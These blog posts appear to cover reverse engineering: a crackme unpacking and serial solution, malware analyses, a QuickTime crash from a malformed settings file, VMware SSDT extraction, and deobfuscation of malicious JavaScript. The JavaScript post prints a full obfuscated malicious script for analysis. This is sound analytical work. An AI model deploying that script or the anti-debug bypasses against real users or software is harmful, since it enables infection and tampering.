Here is the solution I sent to crackmes.de, the crackme is easy but really enjoyable. You can find the crackme at http://www.crackmes.de/users/hmx0101/crappy_fun/

Intro
The crackme is packed with an home-made custom packer. When you run the file, the unpacking process starts and when it stops you should have the original file running on your system. This time it doesn’t happen, the crackme crashes. It’s our job to identify the reason behind the crash, and once you have fixed the file you can search for the right serial.

How to locate where the error occours
What the hell causes the crash? This is the main question, but the real problem is: how to locate where the error occours in an easy way?
You can start analysing the file from the beginning to the end, that’s the right way but it can take a lot of time. I prefer to take another way starting from the crash.

As you know, running the file you’ll obtain a crash. The error box doesn’t help me too much because it shows an error offset at 00059a5a, and looking at the original exe file I didn’t get anything useful at that address. I decided to take a look at the crash dump file generated by the OS. The file I’m referring to is named user.dmp and it’s located under Dr Watson folder. It contains the information of the last occourred crash, the one I’m interested to. To retrieve some information from the file you can load it into Windbg. The classical “!analyze -v” will reveal some hidden info (I copy&paste only some lines):

DEFAULT_BUCKET_ID:  BAD_INSTRUCTION_PTR

LAST_CONTROL_TRANSFER:  from 00405bf9 to 00059a5a

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013ff98 00405bf9 00000000 5d4d0000 00454fe0 0x59a5a
0013ffbc 00469e0b 7c817067 00390032 00390038 CrappyFun+0x5bf9
00400000 00000000 000f0004 0000ffff 000000b8 CrappyFun+0x69e0b

FOLLOWUP_IP:
CrappyFun+5bf9
00405bf9 2c50            sub     al,50h

- DEFAULT_BUCKET_ID
the DEFAULT_BUCKET_ID field shows the general category of failures that this failure belongs to. The name of the category says it all.

- LAST_CONTROL_TRANSFER
it shows the last call on the stack. In this case, seems like the code at address 0×405Bf9 called a function at 0×59A5A

- STACK_TEXT
it shows a stack trace of the faulting component.

- FOLLOWUP_IP
When !analyze determines the instruction that has probably caused the error, it displays it in the FOLLOWUP_IP field.

I think Windbg is not able to produce a good output, seems like there are some errors inside the output generated by the debugging tool. I don’t think the error occours at 405BF9, I think it occours at the previous instruction which is something like “Call 00059a5a”. I got this idea looking at the STACK_TEXT contents.
Windbg shows the code from the original unpacked file, so if you want to inspect the code around 0×405BF9 you have to dump the exe. You can dump it when the error box appears. Here’s the unpacked snippet:

405BF2 push    0
405BF4 call    sub_405B24
405BF9 mov     ds:dword_458664, eax

405B24 jmp     ds:dword_4591E4

4591E4 dword_4591E4    dd 59A5Ah

Bingo! The error occours inside the call at 405BF4. Now I only have to find out what 0×59A5A represents. If you are using IDA you’ll see:

4591D8 dword_4591D8    dd 59A30h               ; DATA XREF: sub_405B3C
4591DC dword_4591DC    dd 59A3Eh               ; DATA XREF: sub_405B34
4591E0 dword_4591E0    dd 59A4Ch               ; DATA XREF: sub_405B2C
4591E4 dword_4591E4    dd 59A5Ah               ; DATA XREF: sub_405B24

These addresses are referenced by instructions like:

jmp ds:dword_0045xxxx

It’s pretty obvious now, these are not-resolved functions. That’s why the exe crashes.
Presumably the point to fix resides inside the procedure used to resolve the API. A good and quick way consist of using some clever breakpoints on functions like LoadLibrary/GetProcAddress; after some minutes I got the right point to patch.

This is how I solved the first point (fix the unpacked file). I think it’s the fastest way because you start looking through the loader having in mind what you are looking for.
Before giving out what to patch I’ll spend some words on the loader. I’m writing a solution and I’ll try to give you a sort of detailed analysis of the packer too.

The packer
The packer has a linear loader, it makes everything easy. The loader starts with an RDTSC trick, it’s located inside the first ten lines of code. The check is performed here:

00469C2B CMP EAX,0FFF
00469C30 JNB CrappyFu.00469E04
00469C36 CALL CrappyFu.00469C3B

If the program reveals the presence of a debugger you won’t pass through 469C36. So, if you want to continue studying the exe you firstly have to get rid of this check.

Just after the initial check you can find a decryption loop:

00469C54 MOV EBX,CrappyFu.00469C72	//	Initial address
00469C59 MOV ECX,384			//	Number of bytes to decrypt
00469C5E MOV AL,9A			//
00469C60 XOR BYTE PTR DS:[ECX+EBX],AL	//	Xor decryption
00469C63 MOV AL,BYTE PTR DS:[ECX+EBX]	//	Decrypted byte is used to decrypt the next one
00469C66 LOOPD SHORT CrappyFu.00469C60	//	Jump up for the next byte to decrypt

The packer’s code was encrypted using a xor operation. When the loop ends you have the packer’s code in front of your eyes, the first thing you should see is an anti debug trick:

00469C68 MOV EAX,DWORD PTR FS:[18]
00469C6F MOV EAX,DWORD PTR DS:[EAX+30]
00469C73 MOVZX EAX,BYTE PTR DS:[EAX+2]
00469C78 CMP EAX,1
00469C7B JE CrappyFu.00469E04

The good old IsDebuggerPresent. You should know how to pass it. It’s the second trick, and if you want to continue analyzing the exe remember to avoid it too. Moreover you’ll have to avoid the next one too:

00469CAA XOR ECX,ECX
00469CAC ADD ECX,10
00469CAF MOV EBX,77FFFFFF
00469CB4 MOV EAX,DWORD PTR FS:[EBX+88000019]	//	eax = 7FFDE000... fs:[18]
00469CBB MOV EAX,DWORD PTR DS:[EAX+ECX*2+10]	//	It's IsDebuggerPresent check!!!
00469CBF MOVZX EAX,BYTE PTR DS:[EAX+2]		//
00469CC3 NOT EAX
00469CC5 AND EAX,1
00469CC8 MOV EBX,EAX				//	ebx = 0 if you are debugging the file
00469CCA PUSH 0C3FBF6				//	Push a dword value
00469CCF CALL CrappyFu.00469CD4
00469CD4 SUB DWORD PTR SS:[ESP],33		//	Fix the return value
00469CD8 MOV ESI,ESP				//
00469CDA ADD ESI,4				//	esi -> value pushed at 469CCA
00469CDD JMP ESI				//	jump to esi

A nice antidebug trick. It’s an IsDebuggerPresent check with an unusual check. In the previous check there’s a compare between the value stored inside eax and 1; this time the check is a little bit writhed.
“PUSH 0C3FBF6″ seems like a simple push of a dword value, but if you check carefully the next instructions you’ll discover the real meaning of the dword value:

0012FFC0   F6FB      IDIV BL				//	F6 FB
0012FFC2   C3        RETN				//	C3
0012FFC3   0069 EB   ADD BYTE PTR DS:[ECX-15],CH	//	00

The author uses an idiv instruction as a final check, if you are debugging the file bl will be 0 and the idiv instruction will raise an exception. Otherwise, you wont have any error and the packer will proceed without any problems.

The next step performed by the packer is another decryption loop. This time it’s not so easy like the first one we saw at the beginning but it’s not hard to understand how it works. The decryption routine decrypts the code section. The decryption uses a dinamically allocated buffer, allocated using VirtualAlloc; since of I should know where the crash occours I’m not interested in this decryption by now. If you want to check the routine pay attention on the antidebug trick, there’s a breakpoint check.

Ok, we are at the end of the loader. The last part of the code is between 0×469E0B and 469F05 addresses. The snippet starts with:

00469E0B PUSHAD
00469E0C JMP SHORT CrappyFu.00469E12

ending with:

00469EFD PUSH 54FD0 //
00469F02 ADD DWORD PTR SS:[ESP],EBP // I guess oep is at 4054FD0
00469F05 RETN //

However, the code between these two address perform some steps:
- decrypt a lot of strings (again, xor decryption)
- retrieve addresses of API
I’m near the solution. Let’s take a look at the routine used to retrieve the addresses (I removed parts of the code):

00469E85 CMP DWORD PTR DS:[EDX],0		//	Is there another address to retrieve? EDX = 0x459118
00469E88 JE SHORT CrappyFu.00469EE3		//	No: jump out
...
00469EA7 PUSH EAX				//	eax -> current function
...
00469EC4 PUSH EBX
00469EC5 CALL ESI				//	GetProcAddress applied to the current function
...
00469EC9 TEST EAX,EAX				//	Address ok?
00469ECB JE CrappyFu.00469E04			//	Jump if error occours
00469ED1 CMP BYTE PTR DS:[EAX],0CC		//	Is there a bpx on the first byte of the current function?
00469ED4 JE CrappyFu.00469E04			//	Yes: error!
00469EDA JMP SHORT CrappyFu.00469EDE		//	No: jump... !?!
00469EDC MOV DWORD PTR DS:[EDX],EAX		//	NOT EXECUTED
00469EDE ADD EDX,4				//	Update edx
00469EE1 JMP SHORT CrappyFu.00469E85

Do you remember why the crash occours? The file crashes because there’s a problem with the value stored inside 4591E4. At 469E85 edx has the value 459118, pretty near the address of the suspicious dword. This is a big hint, I’m in front of the bugged code.
The snippet is a classical piece of code used to fix imported functions, there’s only a strange thing inside this snippet; I’m referring to code around 469EDA. What does it happen to the retrieved address? Nothing… it’s simply discarded!

How to fix it?
I decided to nop the jump instruction at 469EDA. I want to change:

00469ED4  0F84 2AFFFFFF    JE CrappyFu.00469E04
00469EDA  EB 02            JMP SHORT CrappyFu.00469EDE
00469EDC  8902             MOV DWORD PTR DS:[EDX],EAX

into:

00469ED4  0F84 2AFFFFFF    JE zai_Crap.00469E04
00469EDA  90               NOP
00469EDB  90               NOP
00469EDC  8902             MOV DWORD PTR DS:[EDX],EAX

Do you remember the initial xor decryption? This is what I have to solve:

Byte to find ^ *key* = decrypted_byte
byte_463EDB  ^ 0x89  = 0x90	    	-->	byte_463EDB = 0x19
byte_463EDA  ^ 0x90  = 0x90		-->	byte_463EDA = 0x00
byte_463ED9  ^ 0x90  = 0xFF		-->	byte_463ED9 = 0x6F

You can modify the original exe file patching the bytes between 463ED9/463EDB with 0×6F, 0×00 and 0×19 (offset 0×334D9/0×334DB). Now I have a working crackme.

Task 2: the right serial
The crackme is a Delphi application, Dede will tell you everything about the file. The serial check routine starts at 0×454C98 (TForm1_Button1Click). It gets the serial, length must be 6 chars long. The main procedure starts from 0×45475C; it’s a really long procedure. I have to say I wanted to give up, but it’s more easy than it seems. There are mainly 3 functions called many times. The functions I’m referring to are Multiply, Add and Sub; here are some snippets taken from the code:

454773 mov dl, [ebp+s_6]
454776 mov ecx, 4
45477B mov eax, 6 // Multiplier
454780 call Multiply // Execute: eax * dl

45480B pop edx
45480C call add // Execute: eax + edx

454821 pop edx
454822 call sub // Execute: eax - edx

Try stepping a little inside the procedure and you’ll surely get the main point of the routine. If yuo have Ida you don’t have to step a single line because you can understandd everything from the dead list.
The entire procedure is used to create a system of linear equations, 6 equations in 6 variables:

1 * s1 + 3 * s2 + 2 * s3 - 3 * s4 - 4 * s5 - 6 * s6 = -453
2 * s1 - 7 * s2 + 3 * s3 + 7 * s4 + 2 * s5 + 1 * s6 = 849
7 * s1 + 9 * s2 - 6 * s3 - 4 * s4 - 6 * s5 + 7 * s6 = -218
5 * s1 + 2 * s2 + 4 * s3 + 2 * s4 + 4 * s5 - 1 * s6 = 1643
3 * s1 - 1 * s2 + 1 * s3 - 1 * s4 + 1 * s5 - 1 * s6 = 192
8 * s1 - 2 * s2 + 1 * s3 + 1 * s4 - 4 * s5 + 1 * s6 = 134

where s1..s6 are the 6 chars from the serial. The final check is done calling 6 functions sequentially. Each function performs 1 check. First function checks 1° equation (it must be equal to -453), 2° function checks 2° equation (it must be equal to 849) and so on…
I think you can easily find out how the checks are done.

Is it possible to solve the system?
Rank is 6, there’s only 1 solution. When I was at uni I was able to solve such systems in a short time, but now I’m a bit rusty. I could use the elementary method: substitution… I preferred to use an automatic engine. The result is:
s1 = 70 : F
s2 = 97 : a
s3 = 105 : i
s4 = 114 : r
s5 = 121 : y
s6 = 33 : !

The right serial is Fairy!

This is a sort of continuation of the previous post, the one about malware able to infect right-handed only.
It’s a Msn malware, one of the recent one (as far as I remember I got it from Malware Domain List). I think there’s often something interesting inside a malware, no matter what it does and this is a perfect example!

The malware is not really interesting per se, but it has something I’ve never noticed before. It’s not a cool and dangerous new technique, but a coding behaviour. Look at the graph overview:

The image represents the content of a malware procedure. Nothing strange per se, except the fact that it contains 657 instructions in it, too many for a simple malware. It’s a big routine and I was surprised at first because you can do a lot of things with so many instructions. I started analysing the code, nothing is passed to the routine and nothing is returned back to the original caller. I tought it should be an important part of the malware, but I was disappointed by the real content of the routine. After few seconds I realized what’s really going on: 657 lines of code for doing something that normally would require around 50 lines…
The function contains a block of 17 instructions repeated 38 times. When I’m facing things like that I always have a little discussion with my brain. The questions are:
- why do you need to repeat each block 38 times?
- can’t you just use a while statement?
- is this a sort of anti-disassembling trick?
- can you produce such a procedure setting up some specific compiler’s options?

The repeated block contains the instruction below:

00402175    push 9                       ; Length of the string to decrypt
00402177    push offset ntdll_dll        ; String to decrypt
0040217C    push offset aM4l0x123456789  ; key: "M4L0X123456789"
00402181    call sub_401050              ; decrypt "ntdll.dll"
00402186    add  esp, 0Ch
00402189    mov  edi, eax
0040218B    mov  edx, offset ntdll_dll
00402190    or   ecx, 0FFFFFFFFh
00402193    xor  eax, eax
00402195    repne scasb
00402197    not  ecx
00402199    sub  edi, ecx
0040219B    mov  esi, edi
0040219D    mov  eax, ecx
0040219F    mov  edi, edx
004021A1    shr  ecx, 2
004021A4    rep movsd
004021A6    mov  ecx, eax
004021A8    and  ecx, 3
004021AB    rep movsb

It’s only a decryption routine, nothing more. The string is decrypted by the “call 401050″, the rest of the code simply moves the string in the right buffer.
Ok, let’s try answering the initial questions.

According to some PE scanners the exe file was produced by Microsoft Visual C++ 6.0 SPx.
It’s possible to code the big procedure just using a loop (while, for, do-while) containing the snippet above. I don’t think the author used one of these statements because as far as I know it’s not possible to tell the compiler to explode a cycle into a sequence of blocks. At this point I have to options:
- he wrote the same block for 38 times
- he defined a macro with the block’s instructions repeating the macro for 38 times
I won’t code something like that, but the macro option seems to be the most probable choice.
Is it an anti-disassembling trick? My answer is no because it’s really easy to read such a code. You don’t have to deal with variables used inside a for/while; to understand what’s going on you only have to compare three or four blocks.
I don’t have a valid answer to the doubt I had at first….

Trying to find out some more info I studied the rest of the code. I was quite surprised to see another funny diagram.

This time the image represents the content of the procedure used to retrieve the address of the API functions. Again, no while/for/do-while statement. The rectangle on the upper part of the image it’s a sequence of calls to GetProcAddress, and the code below it’s just a sequence of checks on the addresses obtained by GetProcAddress.
It’s a series of:

address = GetProcAddress(hDLL, "function_name");

followed by a series of:

if (!address) goto _error;

Apart the non-use of a loop there’s something more this time, something that I think reveals an unusual coding style; tha author checks errors at the end of the procedure. I always prefer to check return values as soon as I can, it’s not a rule but it’s something that help you to avoid oversight and potential errors… The procedure has a little bug/oversight at the end, the author forgot to close an opened handle. Just a coincidence?

Anyway, two procedures without a single loop. Seems like the author didn’t use any kind of loop for choice. In case you still have some doubts here’s another cool pictures for you:

The routine inside the picture contains the code used to check if the API(s) are patched or not. The check is done comparing the first byte with 0xE8 and 0xE9 (call and jump). If the functions are not patched the malware goes on, otherwise it ends. As you can see no loops are used.

In summary: it’s not jungle code, it’s not an anti-disasm code and it’s not a specific compiler setting. I think it’s only a personal choice, but I would really like to know why the author used this particular style.
Do you have any suggestions?

Beyond the coding style, the malware has some more strange things. As pointed out by *asaperlo*, the code contains a bugged RC4 implementation (Look at the comments of the previous blog post).
It also has a virtual machine check. The idea is pretty simple, the malware checks the nick of the current user. If the nick is “sandbox” or “vmware” you are under a virtual machine…
This malware spawns another one (it’s encrypted inside the file), it might be material for another post.

That’s a funny coded malware for sure!

I’m not kidding, the title is right.

Among all the windows settings there’s one made for left handed people. The option I’m referring to is located under the Mouse control panel, labelled “Switch primary and secondary buttons”. It lets you exchange the functions performed by the right and left mouse button. Don’t know if this setting is usefull or not, most of the left handed friends I have are still using the mouse like a right handed. Maybe they don’t even know the existence of such an option. Anyway, look at this code:

It’s a simple query on a registry key named SwapMouseButtons.
result_value is sent back to the caller, and the caller checks the value. If the value is equal to 0×30 (right handed) the malware goes on running the rest of the code, but if the value is 0×31 (left handed) the malware ends immediately. All the nasty things performed by the malware are executed after this check, it means that a left handed won’t get infected!

I’ve seen some malwares using SwapMouseButton function in the past, but never something like that. I bet the author is left handed and he wrote the check just to be sure to avoid a possible infection… I can’t think of anything else. Quite funny!!!

QTPlayerSession.xml (located under %USERPROFILE\Application Data\Apple Computer\QuickTime\) is used to store various user settings. Among all, it’s used to save a list of favorite movies, and a list of the recent opened files. These lists are called FavoritesListName and MRUListNameWithURLs, here is a possible definition:



There’s a *key* definition followed by an *array* keyword. Inside the *array* tags QuickTime saves some values.
A single item is composed by two lines, the first one (”test 1″) represents the name showed by QuickTime while the other (”C:\Programs\QuickTime\Sample.mov”) is the path of the file. No matter what you write inside the string tag, QuickTime doesn’t check if the text is valid or not.
When QuickTime is fully loaded you can see the items from the *favorites* and *open recent* menu items (I don’t know the right english item’s names because I have an italian version of the software).

When QuickTime starts, it retrieves all the possible information parsing the xml file. It scans MRUListNameWithURLs values, and after that it checks FavoritesListName list. Like every parser, it scans the file tag by tag saving the content of each line inside the memory. When it has all the necessary structures stored inside the memory, the program proceeds retrieving the stored information in order to put them in the right places: *recent opened files* and *favorites files*.

QuickTime takes the values to put inside the two menu items running this piece of code:
1: movzx eax, word ptr [esi]
2: lea eax, [esi+eax*4+4]
3: lea eax, [eax+edi*4]

After instruction at line 2 EAX register points to a series of DWORD values, each DWORD value contains a pointer to a single information to retrieve; EDI represents the index because the dwords are taken one at a time. When MRUListNameWithURLS is checked I have something like:
EAX -> 68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01 0D F0 AD BA AB AB AB AB
0134D268 points to a structure containing “Another test”
0134D308 points to a structure containing “C:\abc.mov”
0134D3D8 points to a structure containing “The last one”
0134D450 points to a structure containing “path”

The bytes above are stored inside a piece of memory allocated at runtime using RtlAllocateHeap function. Every time the snippet above will be executed the program will take a single string, depending on the index value. The items retrieved from the xml file are showed under the right menus when QuickTime is fully loaded. As I said before, there are two defined items for a single file so QuickTime always execute the code two times. The last 8 bytes pointed by EAX are not related with any string, they are just old bytes.

Can you understand what I’m trying to say?
The xml file is updated by QuickTime, but you can edit it. The problem occours when you modify FavoritesListName and MRUListNameWithURLs a little, using something like:



You can modify FavoritesListName in the same way. Of course you can define some more items. The point is that QuickTime is not able to handle item definition without the necessary two lines (name to display and path of the file) inside MRUListNameWithURLs and FavoritesListName; writing down 1 or 3 or 5 or 7 (or 9…) lines between *array* tags you’ll get the same result, a crash.
Why? Well, because the program will take the next not initialized 4 bytes and you don’t know what they are.

I could be wrong, but I don’t think it’s possible to exploit it. It’s a bug that can lead to a sort of denial of service because the crash occours in the initialization process. If your copy crashes you can try checking the xml file.

Some time ago I blogged about Vmware snapshots introducing a way to recognize hidden files by simply comparing two snapshots. I wanted to extend my research on the subject a little bit more, but I didn’t. I got the opportunity to put my hands on some snapshots again in these days. I haven’t anything on my mind, but I was surprised by some coincidences. Look at the information below:

80544bc0: 804fc624 00000000 0000011c 804fca98
80544bd0: bf995ba8 00000000 0000029a bf98f5f8
80544be0: 00000000 00000000 00000000 00000000
80544bf0: 00000000 00000000 00000000 00000000

00544BC0: 24C6 4F80 0000 0000 1C01 0000 98CA 4F80 $.O………..O.
00544BD0: A85B 99BF 0000 0000 9A02 0000 F8F5 98BF .[..............
00544BE0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00544BF0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

First 4 lines are taken from Windbg while I was debugging an XP sp1 virtual machine running under Vmware; last 4 lines are taken from a saved Vmware snapshot (same os of course).
Do you see anything useful? These are KeServiceDescriptorTable[0],[1],[2],[3] and they have of course the same bytes, but there’s something else. There’s a connection between the addresses on the first lines and the offsets on the second ones, just remove the first 2 digits from the address. Do you see it? Look here: 80544BC0/544BC0, 80544BD0/544BD0, 80544BE0/544BE0, 80544BF0/544BF0.

Seems like the kernel memory is stored inside the snapshot. It’s not totally true indeed, there’s only a part of the kernel memory stored inside a Vmware’s snapshot. All the KeServiceDescriptorTable entries are present btw.
SSDT is inside the snapshot I have and it’s complete; SSDT Shadow seems to be inside the snapshot too, but there’s no real connection between kernel memory/snapshot addresses and it’s not complete (it needs some more research btw).

Is it only a coincidence? I tried with some XP machines and the result is the same, it’s possible to obtain real information of SSDT. According to Kayaker’s test it should work on win2k (don’t remember the service pack he was using…).

With this new information it’s pretty easy to code a SSDT revealer. I gave it a try and here is a result:

You can use the program to display SSDT entries and to find out modified entries too by simply comparing an original snapshot with another one.

To retrieve information from a snapshot you have to provide the address of KeServiceDescriptorTable[0] (something like 80544BC0, no “0x” prefix), and you have to select the OS of the virtual machine. After that you can:
1. save an untouched SSDT using the button labelled “Create untouched SSDT”
2. retrieve SSDT information from a snapshot by simply pushing the button labelled “Get snapshot SSDT”. Checking “Load untouched SSDT data” you can compare the original table (previously saved) with the one from the snapshot you’ll select. If a service has been changed you’ll read the word “YES” in the last column.

I took the name of the services from this table: http://metasploit.com/users/opcode/syscalls.html
I can’t test all the OS, if you find one or more errors drop me a mail.

Following this method it’s also possible to get the list of the running processes/modules, more about this later.

SSDT from snapshot

Most of the malicious javascripts out there are sometimes encrypted using commercial tools or, most of the time, using home made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no, it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder is able to show the original code in few milliseconds, and when it fails you can use your brain… not so fast but it helps you to solve the puzzle for sure.
Even if you are able to fool one or more automatic decoder it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awfull indeed. I wanted to see the script code and, as always, I tried using some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the scripts into only one without luck (it should work but I failed, don't know why...). The few decoders I tried were not able to give me a good result. I didn't try searching the net for some more decoders, but I decided to figure it out myself.

The second script starts with: lW4("MGN and ends with O\=m") characters sequence. It's like a generic call where lW4 represents the name of the function to call and the string inside " is the parameter, a very long string. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right way, the line above is pretty similar to the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains useless declarations (jL0 is declared two times, you can remove first one), useless variables (nB73 is not used) and useless strings (you can remove strings like "0u\%N\{\{I\{\\" or 0.1261199). It's pretty easy to remove them, the result I got is showed below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");

Two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code, to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest wasy to see the code. If you read EvilCry’s post you should know the content of the first decrypted code, the other one is:

Just yesterday I had the opportunity to take a look at a sort of obfuscated Javascript code I have never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{

},
cookieName:’feadcbhg’,
getFrameURL : function()
{

},

};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty, it doesn’t need special initial operation. Just after the class definition there are two more lines, a new KyD object is declared and the method “install” will be called.

For me it’s quite uncommon to see a class declaration inside a malicious script, I’m always used to see Javascript code using procedural paradigm. Anyway, this is not a problem of course. The problem arises looking at the declared methods. It’s often easy to understand a Javascript function from the source code, but not this time. Look at this snippet taken from one of the method declared inside KyD class:

Are you able to tell me the content of “o” in few seconds? Even if you know how to handle s you’ll need more than few seconds in order to solve the puzzle.
How to sort out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexp.

How can regexp be used to obfuscate a string?
The string s is composed by 3 parts, two of them are obfuscated substrings while the other one is obtained by getFrameURL, another method of the class KyD.
The substrings have a replace method applied, in this specific case the method is used to search and replace characters from the string with regular expressions. The method is originally used to replace some characters with some other characters in a string:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var s = “Say Hello”;
document.write(str.replace(/Hello/, ‘Ciao’));

The output will be “Say Ciao”, pretty easy. It’s also possible to use some more options, i.e.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, ”)

g option is present and the new string is NULL, it means that part of the string will be cutted away. Which part of the string will be removed? The string to find is defined as a regular expression, everything inside square brackets (’[' and ']‘) will be replaced with NULL. Removing the specified characters from the substring you’ll obtain the de-obfuscated substring:

Now I can decode all the strings obtaining the original script!
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.

There was a challenge today at Didier Stevens’s blog . It’s a pdf puzzle, the goal is to find out the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
Passphrase is not a sequence of ‘X’ for sure. How to find it out?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with notepad reveals the complete structure of the pdf file. The phrase is not inside the file; after a better glimpse at the file I notice these lines:
5 0 obj

/Filter /ASCII85Decode

stream
6<#’\7PQ#@1a#b…

